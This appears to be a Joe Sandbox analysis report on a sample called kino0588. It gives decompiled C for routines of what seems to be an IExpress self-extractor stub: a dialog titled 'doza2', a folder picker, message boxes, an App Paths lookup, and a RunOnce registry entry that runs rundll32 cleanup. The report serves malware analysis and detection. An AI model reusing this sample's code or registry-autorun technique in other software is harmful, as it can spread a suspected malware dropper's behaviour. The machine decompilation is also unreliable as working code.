Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
API String ID: 1002816675-859929227
Opcode ID: 1c79fac562ab4fc0d28c571eace554b2cdeff3cc73ce1009bc1fa394412aeec0
Instruction ID: 246f8c0c9967e84b3ce8e5ceac3d4679e1ae9001e0882aa39b9c3313bd4478cf
Opcode Fuzzy Hash: 1c79fac562ab4fc0d28c571eace554b2cdeff3cc73ce1009bc1fa394412aeec0
Instruction Fuzzy Hash: 0751E670740301ABEB24BB649D4AB7B36D9EB45701F4440EAFA41D71F1DFB48841C729

Uniqueness

Uniqueness Score: -1.00%

Function 00B834F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00B834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0xb891d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0xb88584 = _t35;
					E00B843D0(_t35, GetDesktopWindow());
					__eflags =  *0xb88184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E00B84FE0, 0, 0, 0xb88798);
					 *0xb8879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E00B844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0xb8858c);
					_t38 =  *0xb88584; // 0x0
					_t25 = E00B844B9(_t38, 0x4b2, 0xb81140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0xb891d8 = 1;
						SetEvent( *0xb8858c);
						_t39 =  *0xb8879c; // 0x0
						E00B83680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0xb8858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0xb8879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x00b834fb
0x00b834fe
0x00b83665
0x00b83666
0x00b83666
0x00b83668
0x00b8366e
0x00b8366e
0x00b83671
0x00b83671
0x00b83677
0x00000000
0x00b83677
0x00b83504
0x00b83506
0x00b83507
0x00b8350c
0x00b8365b
0x00b8365f
0x00000000
0x00000000
0x00000000
0x00b83661
0x00b83512
0x00b83515
0x00b835be
0x00b835c1
0x00b835d1
0x00b835d8
0x00b835de
0x00b835f8
0x00b83617
0x00b83617
0x00b83623
0x00b83637
0x00b8363d
0x00b83642
0x00b83644
0x00000000
0x00b83646
0x00b83652
0x00b83657
0x00b83658
0x00000000
0x00b83658
0x00b83644
0x00b8351b
0x00b8351d
0x00b8354f
0x00b83553
0x00000000
0x00000000
0x00b8355f
0x00b83565
0x00b8357c
0x00b83581
0x00b83584
0x00b8359b
0x00b835a1
0x00b835a7
0x00b835ad
0x00b835b3
0x00b835b8
0x00000000
0x00b835b8
0x00b83586
0x00b83588
0x00000000
0x00000000
0x00b83590
0x00000000
0x00b83590
0x00b83524
0x00b83535
0x00b83541
0x00000000
0x00b83549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00B83535
EndDialog.USER32(?,?), ref: 00B83541
ResetEvent.KERNEL32 ref: 00B8355F
SetEvent.KERNEL32(00B81140,00000000,00000020,00000004), ref: 00B83590
GetDesktopWindow.USER32 ref: 00B835C7
GetDlgItem.USER32(?,0000083B), ref: 00B835F1
SendMessageA.USER32(00000000), ref: 00B835F8
GetDlgItem.USER32(?,0000083B), ref: 00B83610
SendMessageA.USER32(00000000), ref: 00B83617
SetWindowTextA.USER32(?,doza2), ref: 00B83623
CreateThread.KERNEL32 ref: 00B83637
EndDialog.USER32(?,00000000), ref: 00B83671

Strings

doza2, xrefs: 00B8361D

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: doza2
API String ID: 2406144884-612509477
Opcode ID: 53f115c84122d4ed8b4ce580909bdf38e5a9d04e4f3d17bf12a9ce4c21b5b349
Instruction ID: 12200ef42214974072d22a4ecc9d0aed1a34b7b6450e37e87f9b4ec9f3ecad85
Opcode Fuzzy Hash: 53f115c84122d4ed8b4ce580909bdf38e5a9d04e4f3d17bf12a9ce4c21b5b349
Instruction Fuzzy Hash: FA31D430244301BBEB207F29EC4DE6B3AE8E796F11F54456AF602A72B4DF758A00CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00B84224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00B84224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E00B844B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0xb888c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0xb887a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0xb88598;
					_v36 = 1;
					_v32 = E00B84200;
					_v28 = 0xb888c0;
					 *0xb8a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0xb8a288(_t32, 0xb888c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0xb888c0 != 0) {
							E00B81680(0xb887a0, 0x104, 0xb888c0);
						}
						 *0xb8a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0xb887a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0xb888c0);
					_t61 = 0xb888c0;
					_t4 =  &(_t61[1]); // 0xb888c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0xb888c0; // 0x1711181
					_t44 = CharPrevA(0xb888c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0xb888c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00b84234
0x00b8423c
0x00b84240
0x00b843b2
0x00b843b7
0x00b843c0
0x00000000
0x00b843c5
0x00b8424c
0x00b84252
0x00b84257
0x00b843a4
0x00b843a5
0x00b843ab
0x00000000
0x00b843ab
0x00b84263
0x00b84269
0x00b8426e
0x00000000
0x00000000
0x00b8427a
0x00b84280
0x00b84285
0x00000000
0x00000000
0x00b8428d
0x00b84293
0x00b842e6
0x00b842e9
0x00b842ef
0x00b842f4
0x00b842f7
0x00b84300
0x00b84307
0x00b8430e
0x00b84315
0x00b8431c
0x00b84322
0x00b84326
0x00b8432d
0x00b8432d
0x00b8432f
0x00b84334
0x00b84343
0x00b84349
0x00b8434d
0x00b84354
0x00b84354
0x00b8435d
0x00b8436e
0x00b8436e
0x00b8437d
0x00b84383
0x00b84387
0x00b8438e
0x00b8438e
0x00b84387
0x00b84391
0x00b84399
0x00000000
0x00b84295
0x00b8429f
0x00b842a5
0x00b842aa
0x00b842aa
0x00b842ad
0x00b842ad
0x00b842af
0x00b842b0
0x00b842b6
0x00b842c2
0x00b842c8
0x00b842ce
0x00b842e4
0x00b842e4
0x00000000
0x00b842ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00B84236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00B8424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00B84263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00B8427A
GetTempPathA.KERNEL32(00000104,00B888C0,?,00000001), ref: 00B8429F
CharPrevA.USER32(00B888C0,01711181,?,00000001), ref: 00B842C2
CharPrevA.USER32(00B888C0,00000000,?,00000001), ref: 00B842D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00B84391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00B843A5

Strings

SHELL32.DLL, xrefs: 00B8422F
SHBrowseForFolder, xrefs: 00B84246
SHGetPathFromIDList, xrefs: 00B84274

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: d97712177ef899a1454b41c7673f88ed376f2e18e91d6393bce4c14d386b9198
Instruction ID: 24726a5679f032fcd43d712123c7cd5478a4f3039b3457165749bad89af304f3
Opcode Fuzzy Hash: d97712177ef899a1454b41c7673f88ed376f2e18e91d6393bce4c14d386b9198
Instruction Fuzzy Hash: 46410474A00206AFE711BF74DC88AAEBBF5EB49344F8401EAE941A32B1CF748C01C765

Uniqueness

Uniqueness Score: -1.00%

Function 00B844B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0xb88004; // 0xfbc33aab
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0xb88a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0xb89a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00B81680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E00B8171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E00B8171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E00B8681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E00B867C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E00B8681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E00B867C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00B86CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x00b844b9
0x00b844c4
0x00b844cb
0x00b844d8
0x00b844e4
0x00b844eb
0x00b844ee
0x00b844ef
0x00b844ef
0x00b844f1
0x00b844f7
0x00b844f8
0x00b8467b
0x00b844fe
0x00b84509
0x00b84518
0x00b84525
0x00b84562
0x00b84568
0x00b84568
0x00b8456b
0x00b8456b
0x00b8456d
0x00b8456e
0x00b84572
0x00b84578
0x00b8457c
0x00b845cb
0x00b84607
0x00b84607
0x00b8460d
0x00b84613
0x00b84617
0x00000000
0x00b8461d
0x00b84623
0x00b84626
0x00b84628
0x00000000
0x00b84628
0x00b845cd
0x00b845cd
0x00b845cf
0x00b845cf
0x00b845d2
0x00b845d2
0x00b845d4
0x00b845d5
0x00b845db
0x00b845de
0x00b845e3
0x00b845e9
0x00b845ed
0x00000000
0x00b845f3
0x00b845fd
0x00000000
0x00b84602
0x00b845ed
0x00b8457e
0x00b8457e
0x00b84580
0x00b84580
0x00b84583
0x00b84583
0x00b84585
0x00b84586
0x00b8458a
0x00b8458c
0x00b8458f
0x00b8458f
0x00b84591
0x00b84592
0x00b8459b
0x00b8459e
0x00b845a3
0x00b845a9
0x00b845ad
0x00000000
0x00b845af
0x00b845af
0x00b845bf
0x00b8462d
0x00b84630
0x00b8463d
0x00b8464e
0x00b8464e
0x00b8463f
0x00b84640
0x00b84647
0x00b8464c
0x00000000
0x00000000
0x00b8464c
0x00b84666
0x00b8466d
0x00b8466f
0x00b84675
0x00b84675
0x00b845ad
0x00b84527
0x00b8452e
0x00b8453f
0x00b8453f
0x00b84530
0x00b84531
0x00b84538
0x00b8453d
0x00000000
0x00000000
0x00b8453d
0x00b84554
0x00b8455a
0x00b8455a
0x00b8455a
0x00b84525
0x00b8468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554
LocalAlloc.KERNEL32(00000040,00000065), ref: 00B845A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 00B845E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 00B8460D
MessageBeep.USER32(00000000), ref: 00B84630
MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00B84666
LocalFree.KERNEL32(00000000), ref: 00B8466F

Part of subcall function 00B8681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00B8686E
Part of subcall function 00B8681F: GetSystemMetrics.USER32(0000004A), ref: 00B868A7
Part of subcall function 00B8681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00B868CC
Part of subcall function 00B8681F: RegQueryValueExA.ADVAPI32(?,00B81140,00000000,?,?,0000000C), ref: 00B868F4
Part of subcall function 00B8681F: RegCloseKey.ADVAPI32(?), ref: 00B86902

Strings

LoadString() Error. Could not load string resource., xrefs: 00B844E4
doza2, xrefs: 00B84545, 00B8465A

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$doza2
API String ID: 3244514340-3130468218
Opcode ID: 80efc1ad03c8b47fdef738761ad081edefd0de1aa49d153e213014d86a6357dd
Instruction ID: 67fdeb391a9b1919ac1d831627dde14e81ec7a1e7d33cd0be0f8c628566a5fba
Opcode Fuzzy Hash: 80efc1ad03c8b47fdef738761ad081edefd0de1aa49d153e213014d86a6357dd
Instruction Fuzzy Hash: 3451B176900216ABDB21BF28CC48BAA7BE9EF46300F1445D5FD49B7261DB71DE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B82773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B82773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0xb88004; // 0xfbc33aab
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00B81781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E00B8658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E00B8658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0xb81140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00B81680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00B86CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00b82773
0x00b8277e
0x00b82785
0x00b8278a
0x00b8278d
0x00b82790
0x00b82792
0x00b82798
0x00b8279d
0x00b828b2
0x00000000
0x00b827a3
0x00b827a3
0x00b827af
0x00b827c2
0x00b827c8
0x00b827cd
0x00b827d5
0x00b828b7
0x00b828b9
0x00000000
0x00b827db
0x00b827dd
0x00b828aa
0x00000000
0x00b827e3
0x00b827e3
0x00b827ec
0x00b827f8
0x00b82803
0x00b8280b
0x00b82831
0x00b828c3
0x00b828c9
0x00b828cd
0x00b82837
0x00b8285a
0x00b8285c
0x00b82865
0x00b82892
0x00b82895
0x00000000
0x00000000
0x00b82867
0x00b82878
0x00b8288c
0x00000000
0x00b8287a
0x00b82880
0x00b82885
0x00b82897
0x00b82899
0x00b82899
0x00b82878
0x00b82865
0x00b828a0
0x00b828bf
0x00b828c1
0x00000000
0x00000000
0x00b828c1
0x00b82831
0x00b827dd
0x00b827d5
0x00b828e5

APIs

CharUpperA.USER32(FBC33AAB,00000000,00000000,00000000), ref: 00B827A8
CharNextA.USER32(0000054D), ref: 00B827B5
CharNextA.USER32(00000000), ref: 00B827BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00B82829
RegQueryValueExA.ADVAPI32(?,00B81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00B82852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00B82870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00B828A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00B828AA
GetSystemDirectoryA.KERNEL32 ref: 00B828B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00B827E4

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: e837290e86f6f559b95a77e4118be9527e9cc80512ad08adc14bcfecb34942ec
Instruction ID: 7d0c1beb940522d3654fef152de4551207bd529ac7d7aff4a3bc5c190c5426c2
Opcode Fuzzy Hash: e837290e86f6f559b95a77e4118be9527e9cc80512ad08adc14bcfecb34942ec
Instruction Fuzzy Hash: 84419371A0012CAFEB24AB649C85AEA77FDEF55700F0040EAF545E3160DB708E86DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B82267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B82267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0xb88004; // 0xfbc33aab
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0xb88530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E00B8658A( &_v268, 0x104, 0xb81140);
							}
							_push("C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
							E00B8171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00B86CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00b82272
0x00b82277
0x00b82279
0x00b82283
0x00b82289
0x00b822ab
0x00b822b1
0x00b822c4
0x00b822e0
0x00b822e6
0x00b822f5
0x00b8230d
0x00b8231c
0x00b8231c
0x00b82321
0x00b8233a
0x00b82342
0x00b82348
0x00b8234b
0x00b8234c
0x00b8234c
0x00b8234e
0x00b8234f
0x00b8236e
0x00b8236e
0x00b8237a
0x00b82380
0x00b82380
0x00b82381
0x00b82381
0x00b8238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00B822A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 00B822D8
memset.MSVCRT ref: 00B822F5
GetSystemDirectoryA.KERNEL32 ref: 00B82305
RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00B8236E
RegCloseKey.ADVAPI32(?), ref: 00B8237A

Strings

wextract_cleanup3, xrefs: 00B8227C, 00B822CD, 00B82363
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00B8232D
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00B82299
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B82321

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity
